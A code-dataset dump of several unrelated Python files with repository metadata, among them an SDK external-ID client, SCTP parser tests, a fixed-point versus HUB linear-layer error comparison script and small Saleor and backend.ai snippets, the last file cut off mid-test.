| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
96087549b88cdcd0833a914b38e0be492f5d08d1
| 330
|
py
|
Python
|
cc-sdk-mini/CloudConformity/ExternalID.py
|
zachwhaley/thus
|
22b006c4ea110fbdc09a79c38e49e79ba04bb4d4
|
[
"MIT"
] | 24
|
2020-09-10T18:34:04.000Z
|
2022-02-09T01:52:20.000Z
|
cc-sdk-mini/CloudConformity/ExternalID.py
|
zachwhaley/thus
|
22b006c4ea110fbdc09a79c38e49e79ba04bb4d4
|
[
"MIT"
] | 5
|
2020-09-11T17:22:08.000Z
|
2021-09-08T15:51:58.000Z
|
cc-sdk-mini/CloudConformity/ExternalID.py
|
zachwhaley/thus
|
22b006c4ea110fbdc09a79c38e49e79ba04bb4d4
|
[
"MIT"
] | 6
|
2020-09-10T20:03:00.000Z
|
2021-06-25T07:33:21.000Z
|
class ExternalID:
    def __init__(self, config, connection):
        self._config = config
        self._connection = connection

    def get(self):
        return self._connection.get(url='/organisation/external-id')

    def create(self, data):
        # Pass the caller's data through; the original posted payload=None and
        # silently ignored the `data` argument.
        return self._connection.post(url='/organisation/external-id', payload=data)
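# Illustrative usage (added; assumes a connection object exposing the get/post
# interface used above -- the payload shape shown is hypothetical):
#
#     external_id = ExternalID(config, connection)
#     current = external_id.get()
#     created = external_id.create({'data': {'type': 'external-ids'}})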
| 36.666667
| 83
| 0.681818
| 38
| 330
| 5.710526
| 0.473684
| 0.193548
| 0.184332
| 0.230415
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 330
| 9
| 83
| 36.666667
| 0.82197
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 0.151515
| 0
| 0
| 0
| 0
| 0
| 1
| 0.375
| false
| 0
| 0
| 0.25
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
9614eee6cc72ee6204c436cbb0e5ee40d29f402a
| 8,035
|
py
|
Python
|
insights/parsers/tests/test_sctp.py
|
smalleni/insights-core
|
3961d400f032b2b1ed66665813ebe5220f27c62d
|
[
"Apache-2.0"
] | null | null | null |
insights/parsers/tests/test_sctp.py
|
smalleni/insights-core
|
3961d400f032b2b1ed66665813ebe5220f27c62d
|
[
"Apache-2.0"
] | null | null | null |
insights/parsers/tests/test_sctp.py
|
smalleni/insights-core
|
3961d400f032b2b1ed66665813ebe5220f27c62d
|
[
"Apache-2.0"
] | null | null | null |
import doctest
import pytest
from insights.parsers import ParseException, SkipException
from insights.parsers import sctp
from insights.parsers.sctp import SCTPEps
from insights.parsers.sctp import SCTPAsc
from insights.tests import context_wrap
SCTP_EPS_DETAILS = """
ENDPT SOCK STY SST HBKT LPORT UID INODE LADDRS
ffff88017e0a0200 ffff880299f7fa00 2 10 29 11165 200 299689357 10.0.0.102 10.0.0.70
ffff880612e81c00 ffff8803c28a1b00 2 10 30 11166 200 273361203 10.0.0.102 10.0.0.70 172.31.1.2
ffff88061fba9800 ffff88061f8a3180 2 10 31 11167 200 273361145 10.0.0.102 10.0.0.70
ffff88031e6f1a00 ffff88031dbdb180 2 10 32 11168 200 273365974 10.0.0.102 10.0.0.70 192.168.11.2
""".strip()
SCTP_EPS_DETAILS_NO = """
ENDPT SOCK STY SST LPORT UID INODE LADDRS
ffff88017e0a0200 ffff880299f7fa00 2 10 11165 200 299689357 10.0.0.102 10.0.0.70
ffff880612e81c00 ffff8803c28a1b00 2 10 11166 200 273361203 10.0.0.102 10.0.0.70 172.31.1.2
ffff88061fba9800 ffff88061f8a3180 2 10 11167 200 273361145 10.0.0.102 10.0.0.70
ffff88031e6f1a00 ffff88031dbdb180 2 10 11168 200 273365974 10.0.0.102 10.0.0.70 192.168.11.2
""".strip()
SCTP_EPS_DETAILS_DOC = """
ENDPT SOCK STY SST HBKT LPORT UID INODE LADDRS
ffff88017e0a0200 ffff880299f7fa00 2 10 29 11165 200 299689357 10.0.0.102 10.0.0.70
ffff880612e81c00 ffff8803c28a1b00 2 10 30 11166 200 273361203 10.0.0.102 10.0.0.70 172.31.1.2
""".strip()
SCTP_EPS_DETAILS_NO_2 = """
""".strip()
SCTP_ASSOC = """
ASSOC SOCK STY SST ST HBKT ASSOC-ID TX_QUEUE RX_QUEUE UID INODE LPORT RPORT LADDRS <-> RADDRS HBINT INS OUTS MAXRT T1X T2X RTXC
ffff88045ac7e000 ffff88062077aa00 2 1 4 1205 963 0 0 200 273361167 11567 11166 10.0.0.102 10.0.0.70 <-> *10.0.0.109 10.0.0.77 1000 2 2 10 0 0 0
ffff88061fbf2000 ffff88060ff92500 2 1 4 1460 942 0 0 200 273360669 11566 11167 10.0.0.102 10.0.0.70 <-> *10.0.0.109 10.0.0.77 1000 2 2 10 0 0 0
ffff8803217b9000 ffff8801c6321580 2 1 4 1675 977 0 0 200 273361369 11565 11168 10.0.0.102 10.0.0.70 192.168.11.2 <-> *10.0.0.109 10.0.0.77 1000 2 2 10 0 0 0
ffff8803db908000 ffff88061e4a00c0 2 1 4 2229 967 0 0 200 273361177 12067 11166 10.0.0.102 10.0.0.70 <-> *10.0.0.110 10.0.0.78 1000 2 2 10 0 0 0
ffff88062258f000 ffff88060fffaa40 2 1 4 2485 953 0 0 200 273360681 12066 11166 10.0.0.102 10.0.0.70 <-> *10.0.0.103 10.0.0.71 1000 2 2 10 0 0 0
ffff8801ce686000 ffff8801c7083ac0 2 1 4 2741 982 0 0 200 273361381 12065 11166 10.0.0.102 10.0.0.70 <-> *10.0.0.112 10.0.0.80 1000 2 2 10 0 0 0
ffff88031e1f4000 ffff8801c6fd9b00 2 1 4 7092 1005 0 0 200 273366011 11567 11167 10.0.0.102 10.0.0.70 <-> *10.0.0.111 10.0.0.79 1000 2 2 10 0 0 0
""".strip()
SCTP_ASSOC_2 = """
ASSOC SOCK STY SST ST HBKT ASSOC-ID TX_QUEUE RX_QUEUE UID INODE LPORT RPORT LADDRS <-> RADDRS HBINT INS OUTS MAXRT T1X T2X RTXC
ffff8804239ca000 ffff8804238c6040 2 1 4 3091 1 0 0 500 90293 37379 3868 10.0.200.114 10.0.201.114 2010:0010:0000:0200:0000:0000:0000:0114 2010:0010:0000:0201:0000:0000:0000:0114 <-> *10.0.100.94 10.0.101.94 2010:0010:0000:0100:0000:0000:0000:0094 2010:0010:0000:0101:0000:0000:0000:0094 1000 5 5 10 0 0 0
""".strip()
SCTP_ASSOC_DOC = """
ASSOC SOCK STY SST ST HBKT ASSOC-ID TX_QUEUE RX_QUEUE UID INODE LPORT RPORT LADDRS <-> RADDRS HBINT INS OUTS MAXRT T1X T2X RTXC
ffff88045ac7e000 ffff88062077aa00 2 1 4 1205 963 0 0 200 273361167 11567 11166 10.0.0.102 10.0.0.70 <-> *10.0.0.109 10.0.0.77 1000 2 2 10 0 0 0
ffff88061fbf2000 ffff88060ff92500 2 1 4 1460 942 0 0 200 273360669 11566 11167 10.0.0.102 10.0.0.70 <-> *10.0.0.109 10.0.0.77 1000 2 2 10 0 0 0
""".strip()
SCTP_ASSOC_NO = """
""".strip()
SCTP_ASSOC_NO_2 = """
SOCK STY SST ST HBKT ASSOC-ID TX_QUEUE RX_QUEUE UID INODE LPORT RPORT LADDRS RADDRS HBINT INS OUTS MAXRT T1X T2X RTXC
ffff88045ac7e000 ffff88062077aa00 2 1 4 1205 963 0 0 200 273361167 11567 11166 10.0.0.102 10.0.0.70 *10.0.0.109 10.0.0.77 1000 2 2 10 0 0 0
""".strip()
def test_sctp_eps():
    sctp_info = SCTPEps(context_wrap(SCTP_EPS_DETAILS))
    assert sorted(sctp_info.sctp_local_ports) == sorted(['11165', '11166', '11167', '11168'])
    assert sorted(sctp_info.sctp_local_ips) == sorted(['10.0.0.102', '10.0.0.70', '172.31.1.2', '192.168.11.2'])
    assert sctp_info.sctp_eps_ips == {'ffff88017e0a0200': ['10.0.0.102', '10.0.0.70'],
                                      'ffff880612e81c00': ['10.0.0.102', '10.0.0.70', '172.31.1.2'],
                                      'ffff88061fba9800': ['10.0.0.102', '10.0.0.70'],
                                      'ffff88031e6f1a00': ['10.0.0.102', '10.0.0.70', '192.168.11.2']}
    assert len(sctp_info.search(local_port='11165')) == 1


def test_sctp_asc():
    sctp_asc = SCTPAsc(context_wrap(SCTP_ASSOC))
    assert sorted(sctp_asc.sctp_local_ports) == sorted(['11567', '11566', '11565', '12067', '12065', '12066'])
    assert sorted(sctp_asc.search(local_port='11565')) == sorted([{'init_chunks_send': '0', 'uid': '200', 'shutdown_chunks_send': '0', 'max_outstream': '2', 'tx_que': '0', 'inode': '273361369', 'hrtbt_intrvl': '1000', 'sk_type': '2', 'remote_addr': ['*10.0.0.109', '10.0.0.77'], 'data_chunks_retrans': '0', 'local_addr': ['10.0.0.102', '10.0.0.70', '192.168.11.2'], 'asc_id': '977', 'max_instream': '2', 'remote_port': '11168', 'asc_state': '4', 'max_retrans_atmpt': '10', 'sk_state': '1', 'socket': 'ffff8801c6321580', 'asc_struct': 'ffff8803217b9000', 'local_port': '11565', 'hash_bkt': '1675', 'rx_que': '0'}])
    assert len(sctp_asc.search(local_port='11567')) == 2
    assert sorted(sctp_asc.sctp_local_ips) == sorted(['10.0.0.102', '10.0.0.70', '192.168.11.2'])
    assert sorted(sctp_asc.sctp_remote_ips) == sorted(['*10.0.0.109', '10.0.0.77', '*10.0.0.110', '10.0.0.78', '*10.0.0.103', '10.0.0.71', '*10.0.0.112', '10.0.0.80', '*10.0.0.111', '10.0.0.79'])
    sctp_asc = SCTPAsc(context_wrap(SCTP_ASSOC_2))
    assert sorted(sctp_asc.sctp_local_ips) == sorted(['10.0.200.114', '10.0.201.114', '2010:0010:0000:0200:0000:0000:0000:0114', '2010:0010:0000:0201:0000:0000:0000:0114'])
    assert sorted(sctp_asc.sctp_remote_ips) == sorted(['*10.0.100.94', '10.0.101.94', '2010:0010:0000:0100:0000:0000:0000:0094', '2010:0010:0000:0101:0000:0000:0000:0094'])


def test_sctp_eps_exceptions():
    with pytest.raises(ParseException) as exc:
        sctp_obj = SCTPEps(context_wrap(SCTP_EPS_DETAILS_NO))
        assert sctp_obj is None  # Just added to remove flake8 warnings
    assert 'Contents are not compatible to this parser' in str(exc)
    with pytest.raises(SkipException) as exc:
        sctp_obj = SCTPEps(context_wrap(SCTP_EPS_DETAILS_NO_2))
        assert sctp_obj is None  # Just added to remove flake8 warnings
    assert 'No Contents' in str(exc)


def test_sctp_asc_exceptions():
    with pytest.raises(ParseException) as exc:
        sctp_asc = SCTPAsc(context_wrap(SCTP_ASSOC_NO_2))
        assert sctp_asc is None
    assert 'Contents are not compatible to this parser' in str(exc)
    with pytest.raises(SkipException) as exc:
        sctp_asc = SCTPAsc(context_wrap(SCTP_ASSOC_NO))
        assert sctp_asc is None
    assert 'No Contents' in str(exc)


def test_sctp_doc_examples():
    env = {
        'sctp_info': SCTPEps(context_wrap(SCTP_EPS_DETAILS_DOC)),
        'sctp_asc': SCTPAsc(context_wrap(SCTP_ASSOC_DOC))
    }
    failed, total = doctest.testmod(sctp, globs=env)
    assert failed == 0
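# Orientation note (added): a minimal standalone sketch mirroring the assertions
# above -- SCTPEps consumes /proc/net/sctp/eps-style content and exposes the
# parsed ports and addresses:
#
#     eps = SCTPEps(context_wrap(SCTP_EPS_DETAILS))
#     eps.sctp_local_ports            ->  ['11165', '11166', '11167', '11168']
#     eps.search(local_port='11165')  ->  list with the single matching endpoint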
| 66.958333
| 613
| 0.634101
| 1,350
| 8,035
| 3.66963
| 0.156296
| 0.048042
| 0.078321
| 0.038151
| 0.768268
| 0.739201
| 0.711344
| 0.680258
| 0.614655
| 0.590028
| 0
| 0.369905
| 0.23659
| 8,035
| 119
| 614
| 67.521008
| 0.437724
| 0.009085
| 0
| 0.350515
| 0
| 0.257732
| 0.643171
| 0.039201
| 0
| 0
| 0
| 0
| 0.206186
| 1
| 0.051546
| false
| 0
| 0.072165
| 0
| 0.123711
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
828d4307e5b45d45f0239b1049b64ef15e2663f6
| 7,668
|
py
|
Python
|
test/kernel/test_kernel_linear_fxp_hub_compare.py
|
jingjieli95/UnarySim
|
775b38fa2d6b05a69fd73acb4766e50200a5cc37
|
[
"MIT"
] | 17
|
2020-04-26T19:38:03.000Z
|
2022-02-23T02:05:08.000Z
|
test/kernel/test_kernel_linear_fxp_hub_compare.py
|
jingjieli95/UnarySim
|
775b38fa2d6b05a69fd73acb4766e50200a5cc37
|
[
"MIT"
] | 3
|
2021-11-03T18:20:29.000Z
|
2022-02-11T16:30:16.000Z
|
test/kernel/test_kernel_linear_fxp_hub_compare.py
|
jingjieli95/UnarySim
|
775b38fa2d6b05a69fd73acb4766e50200a5cc37
|
[
"MIT"
] | 9
|
2019-12-03T05:08:55.000Z
|
2022-01-04T20:24:55.000Z
|
# %%
import torch
from UnarySim.kernel.linear import *
import matplotlib.pyplot as plt
import time
import math
import numpy as np
# %%
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# %%
def test(rounding="round", abs_err=True):
    ufc_err_min_list = []
    ufc_err_max_list = []
    ufc_err_mean_list = []
    ufc_err_std_list = []

    ofc_err_min_list = []
    ofc_err_max_list = []
    ofc_err_mean_list = []
    ofc_err_std_list = []

    ifc_err_min_list = []
    ifc_err_max_list = []
    ifc_err_mean_list = []
    ifc_err_std_list = []

    x_label = []
    for bitwidth in range(6, 13):
        cycle = 2**(bitwidth-1)
        in_feature = 2
        out_feature = 2**12
        bias = False

        input = torch.cat(2*[(torch.arange(0, out_feature)/out_feature - 0.5).unsqueeze(1)], 1).to(device)
        input[:, 1] = 0.

        fc = torch.nn.Linear(in_feature, out_feature, bias=bias).to(device)
        fc.weight.data = torch.cat(2*[(torch.arange(0, out_feature)/out_feature - 0.5).unsqueeze(1)], 1).to(device)
        fc.weight.data[:, 1] = 0.
        fc_o = fc(input)

        ufc = HUBLinear(in_feature, out_feature, bias=bias, binary_weight=fc.weight.data, binary_bias=fc.bias, cycle=cycle, rounding=rounding).to(device)
        ufc_o = ufc(input)

        ofc = FxpLinear(in_feature, out_feature, bias=bias, binary_weight=fc.weight.data, binary_bias=fc.bias, bitwidth=bitwidth, keep_res="output", more_res="input", rounding=rounding).to(device)
        ofc_o = ofc(input)

        ifc = FxpLinear(in_feature, out_feature, bias=bias, binary_weight=fc.weight.data, binary_bias=fc.bias, bitwidth=bitwidth, keep_res="input", more_res="input", rounding=rounding).to(device)
        ifc_o = ifc(input)

        if abs_err is True:
            ufc_err = (ufc_o - fc_o)
            ofc_err = (ofc_o - fc_o)
            ifc_err = (ifc_o - fc_o)
        else:
            ufc_err = (ufc_o - fc_o) / fc_o
            ofc_err = (ofc_o - fc_o) / fc_o
            ifc_err = (ifc_o - fc_o) / fc_o

        ufc_err_min_list.append(np.nanmin(ufc_err.cpu().detach().numpy()))
        ufc_err_max_list.append(np.nanmax(ufc_err.cpu().detach().numpy()))
        ufc_err_mean_list.append(np.nanmean(np.abs(ufc_err.cpu().detach().numpy())))
        ufc_err_std_list.append(np.nanstd(ufc_err.cpu().detach().numpy()))

        ofc_err_min_list.append(np.nanmin(ofc_err.cpu().detach().numpy()))
        ofc_err_max_list.append(np.nanmax(ofc_err.cpu().detach().numpy()))
        ofc_err_mean_list.append(np.nanmean(np.abs(ofc_err.cpu().detach().numpy())))
        ofc_err_std_list.append(np.nanstd(ofc_err.cpu().detach().numpy()))

        ifc_err_min_list.append(np.nanmin(ifc_err.cpu().detach().numpy()))
        ifc_err_max_list.append(np.nanmax(ifc_err.cpu().detach().numpy()))
        ifc_err_mean_list.append(np.nanmean(np.abs(ifc_err.cpu().detach().numpy())))
        ifc_err_std_list.append(np.nanstd(ifc_err.cpu().detach().numpy()))

        x_label.append(2**(bitwidth-1))
    return ufc_err_min_list, ufc_err_max_list, ufc_err_mean_list, ufc_err_std_list, ofc_err_min_list, ofc_err_max_list, ofc_err_mean_list, ofc_err_std_list, ifc_err_min_list, ifc_err_max_list, ifc_err_mean_list, ifc_err_std_list, x_label
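# Note (added for clarity): each tested configuration pairs bitwidth b with
# cycle = 2**(b-1); the "6-32", "7-64", ..., "12-2048" x-axis labels used in the
# plotting cells below encode exactly this bitwidth-cycle pair.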
# %%
rounding = "round"
abs_err = True
ufc_err_min_list, ufc_err_max_list, ufc_err_mean_list, ufc_err_std_list, ofc_err_min_list, ofc_err_max_list, ofc_err_mean_list, ofc_err_std_list, ifc_err_min_list, ifc_err_max_list, ifc_err_mean_list, ifc_err_std_list, x_label = test(rounding, abs_err)
print(ufc_err_mean_list)
print(ufc_err_std_list)
print()
print(ofc_err_mean_list)
print(ofc_err_std_list)
print()
print(ifc_err_mean_list)
print(ifc_err_std_list)
print()
print(x_label)
# %%
import matplotlib.pyplot as plt
import matplotlib
import numpy as np
font = {'family':'Times New Roman', 'size': 6}
matplotlib.rc('font', **font)
my_dpi = 300
fig_h = 1
fig_w = 3.3115
# construct some data like what you have:
x = np.array([i for i in range(len(ufc_err_mean_list))])
means1 = np.array(ufc_err_mean_list)
stds1 = np.array(ufc_err_std_list)
mins1 = np.array(ufc_err_min_list)
maxs1 = np.array(ufc_err_max_list)
means2 = np.array(ofc_err_mean_list)
stds2 = np.array(ofc_err_std_list)
mins2 = np.array(ofc_err_min_list)
maxs2 = np.array(ofc_err_max_list)
means3 = np.array(ifc_err_mean_list)
stds3 = np.array(ifc_err_std_list)
mins3 = np.array(ifc_err_min_list)
maxs3 = np.array(ifc_err_max_list)
x_label = ['6-32', '7-64', '8-128', '9-256', '10-512', '11-1024', '12-2048']
width = 0.20
fig, ax = plt.subplots(figsize=(fig_w, fig_h))
ax.plot(x, means1, "-o", label="uSystolic", color="#7A81FF", ms=4)
ax.fill_between(x, means1-stds1, means1+stds1, alpha=0.3, color="#7A81FF", edgecolor=None)
ax.plot(x, means2, "-s", label="FXP-o-res", color="#FF7F7F", ms=4)
ax.fill_between(x, means2-stds2, means2+stds2, alpha=0.3, color="#FF7F7F", edgecolor=None)
ax.plot(x, means3, "-^", label="FXP-i-res", color="#D783FF", ms=4)
ax.fill_between(x, means3-stds3, means3+stds3, alpha=0.3, color="#D783FF", edgecolor=None)
ax.set_xticks(x)
ax.set_xticklabels(x_label)
ax.set_yscale('linear')
ax.set_yticks([0, 0.01, 0.02])
ax.set_yticklabels(["0.00", "0.01", "0.02"])
ax.legend(loc="upper right", ncol=3, frameon=False)
fig.tight_layout()
plt.show()
fig.savefig("test_kernel_linear_fxp_hub_compare_abs_err.pdf", bbox_inches='tight', dpi=my_dpi, pad_inches=0.02)
# %%
rounding = "round"
abs_err = False
ufc_err_min_list, ufc_err_max_list, ufc_err_mean_list, ufc_err_std_list, ofc_err_min_list, ofc_err_max_list, ofc_err_mean_list, ofc_err_std_list, ifc_err_min_list, ifc_err_max_list, ifc_err_mean_list, ifc_err_std_list, x_label = test(rounding, abs_err)
print(ufc_err_mean_list)
print(ufc_err_std_list)
print()
print(ofc_err_mean_list)
print(ofc_err_std_list)
print()
print(ifc_err_mean_list)
print(ifc_err_std_list)
print()
print(x_label)
# %%
import matplotlib.pyplot as plt
import matplotlib
import numpy as np
font = {'family':'Times New Roman', 'size': 6}
matplotlib.rc('font', **font)
my_dpi = 300
fig_h = 1
fig_w = 3.3115
# construct some data like what you have:
x = np.array([i for i in range(len(ufc_err_mean_list))])
means1 = np.array(ufc_err_mean_list)
stds1 = np.array(ufc_err_std_list)
mins1 = np.array(ufc_err_min_list)
maxs1 = np.array(ufc_err_max_list)
means2 = np.array(ofc_err_mean_list)
stds2 = np.array(ofc_err_std_list)
mins2 = np.array(ofc_err_min_list)
maxs2 = np.array(ofc_err_max_list)
means3 = np.array(ifc_err_mean_list)
stds3 = np.array(ifc_err_std_list)
mins3 = np.array(ifc_err_min_list)
maxs3 = np.array(ifc_err_max_list)
x_label = ['6-32', '7-64', '8-128', '9-256', '10-512', '11-1024', '12-2048']
width = 0.20
fig, ax = plt.subplots(figsize=(fig_w, fig_h))
ax.plot(x, means1, "-o", label="uSystolic", color="#7A81FF", ms=4)
ax.fill_between(x, means1-stds1, means1+stds1, alpha=0.3, color="#7A81FF", edgecolor=None)
ax.plot(x, means2, "-s", label="FXP-o-res", color="#FF7F7F", ms=4)
ax.fill_between(x, means2-stds2, means2+stds2, alpha=0.3, color="#FF7F7F", edgecolor=None)
ax.plot(x, means3, "-^", label="FXP-i-res", color="#D783FF", ms=4)
ax.fill_between(x, means3-stds3, means3+stds3, alpha=0.3, color="#D783FF", edgecolor=None)
ax.set_xticks(x)
ax.set_xticklabels(x_label)
ax.set_yscale('linear')
ax.set_yticks([0, 0.4, 0.8])
ax.set_yticklabels(["0.00", "0.40", "0.80"])
# ax.legend(loc="upper right", ncol=3, frameon=False)
fig.tight_layout()
plt.show()
fig.savefig("test_kernel_linear_fxp_hub_compare_rel_err.pdf", bbox_inches='tight', dpi=my_dpi, pad_inches=0.02)
# %%
| 33.051724
| 252
| 0.69614
| 1,328
| 7,668
| 3.70256
| 0.131777
| 0.04881
| 0.064877
| 0.041489
| 0.914379
| 0.899939
| 0.826927
| 0.766524
| 0.74761
| 0.734798
| 0
| 0.039492
| 0.148018
| 7,668
| 231
| 253
| 33.194805
| 0.713149
| 0.020214
| 0
| 0.588957
| 0
| 0
| 0.063725
| 0.012265
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006135
| false
| 0
| 0.07362
| 0
| 0.08589
| 0.122699
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
829b1c227b83ecabfae2994759613995e47d79a5
| 83
|
py
|
Python
|
tests/test_sampleMangler.py
|
cowanml/samplemangler
|
cd2b772beb74cf5d2106cd67e74e95ebafc74735
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_sampleMangler.py
|
cowanml/samplemangler
|
cd2b772beb74cf5d2106cd67e74e95ebafc74735
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_sampleMangler.py
|
cowanml/samplemangler
|
cd2b772beb74cf5d2106cd67e74e95ebafc74735
|
[
"BSD-3-Clause"
] | null | null | null |
from sampleMangler.__main__ import main


def test_main():
    assert main([]) == 0
| 16.6
| 39
| 0.698795
| 11
| 83
| 4.818182
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014706
| 0.180723
| 83
| 4
| 40
| 20.75
| 0.764706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
82b441794f9e72c5af1f92de572a2106ef9043ce
| 206
|
py
|
Python
|
src/isaw.facultycv/isaw/facultycv/interfaces/peopleview.py
|
isawnyu/isaw.web
|
604499f9fa55d1ce9698ca05f85ddb54a88f1cab
|
[
"CC-BY-3.0"
] | null | null | null |
src/isaw.facultycv/isaw/facultycv/interfaces/peopleview.py
|
isawnyu/isaw.web
|
604499f9fa55d1ce9698ca05f85ddb54a88f1cab
|
[
"CC-BY-3.0"
] | 405
|
2015-03-12T18:20:25.000Z
|
2022-03-07T18:44:16.000Z
|
src/isaw.facultycv/isaw/facultycv/interfaces/peopleview.py
|
isawnyu/isaw.web
|
604499f9fa55d1ce9698ca05f85ddb54a88f1cab
|
[
"CC-BY-3.0"
] | 1
|
2016-11-07T21:18:49.000Z
|
2016-11-07T21:18:49.000Z
|
from zope.interface import Interface


class IPeopleView(Interface):
    """People View.
    """
| 41.2
| 147
| 0.325243
| 10
| 206
| 6.7
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.621359
| 206
| 4
| 148
| 51.5
| 0.858974
| 0.058252
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7d562a20da4ff16ea89ead622e2fcd5bfd4feed6
| 35
|
py
|
Python
|
my_test_proj/__init__.py
|
ColumbiaOSS/4995-demo
|
59ed33c6640935387b6e89b4db492ba92a2457a1
|
[
"Apache-2.0"
] | 1
|
2021-05-21T11:44:08.000Z
|
2021-05-21T11:44:08.000Z
|
my_test_proj/__init__.py
|
ColumbiaOSS/4995-demo
|
59ed33c6640935387b6e89b4db492ba92a2457a1
|
[
"Apache-2.0"
] | 1
|
2020-09-29T18:50:34.000Z
|
2020-10-04T22:57:39.000Z
|
my_test_proj/__init__.py
|
ColumbiaOSS/4995-demo
|
59ed33c6640935387b6e89b4db492ba92a2457a1
|
[
"Apache-2.0"
] | 8
|
2020-09-17T22:08:10.000Z
|
2020-12-26T08:23:51.000Z
|
from .foo import inc # noqa: F401
| 17.5
| 34
| 0.685714
| 6
| 35
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 0.228571
| 35
| 1
| 35
| 35
| 0.777778
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7d8754fb92a0b65b067a61f764de9144df30896e
| 179
|
py
|
Python
|
saleor/graphql/channel/resolvers.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 15,337
|
2015-01-12T02:11:52.000Z
|
2021-10-05T19:19:29.000Z
|
saleor/graphql/channel/resolvers.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 7,486
|
2015-02-11T10:52:13.000Z
|
2021-10-06T09:37:15.000Z
|
saleor/graphql/channel/resolvers.py
|
aminziadna/saleor
|
2e78fb5bcf8b83a6278af02551a104cfa555a1fb
|
[
"CC-BY-4.0"
] | 5,864
|
2015-01-16T14:52:54.000Z
|
2021-10-05T23:01:15.000Z
|
from ...channel import models


def resolve_channel(id):
    return models.Channel.objects.filter(id=id).first()


def resolve_channels():
    return models.Channel.objects.all()
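# Illustrative calls (added): resolve_channel(id=1) returns the matching Channel
# instance or None; resolve_channels() returns the unfiltered queryset.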
| 17.9
| 55
| 0.73743
| 24
| 179
| 5.416667
| 0.541667
| 0.153846
| 0.292308
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134078
| 179
| 9
| 56
| 19.888889
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
7db16feabfd7af389f415f15cb28445935206dac
| 1,748
|
py
|
Python
|
tests/output/test_types.py
|
youngjun0627/backend.ai-client-py
|
be7c174ab73e112fdb8be61e6affc20fc72f7d59
|
[
"MIT"
] | 7
|
2019-01-18T08:08:42.000Z
|
2022-02-10T00:36:24.000Z
|
tests/output/test_types.py
|
youngjun0627/backend.ai-client-py
|
be7c174ab73e112fdb8be61e6affc20fc72f7d59
|
[
"MIT"
] | 179
|
2017-09-07T04:54:44.000Z
|
2022-03-29T11:30:47.000Z
|
tests/output/test_types.py
|
youngjun0627/backend.ai-client-py
|
be7c174ab73e112fdb8be61e6affc20fc72f7d59
|
[
"MIT"
] | 13
|
2017-09-08T05:37:44.000Z
|
2021-09-14T23:35:31.000Z
|
from ai.backend.client.output.types import FieldSet, FieldSpec


def test_fieldspec_init():
    f = FieldSpec("key_foo")
    assert f.field_ref == "key_foo"
    assert f.field_name == "key_foo"
    assert f.humanized_name == "Key Foo"
    assert f.alt_name == "key_foo"
    assert not f.subfields

    f = FieldSpec("key_foo", "Foo")
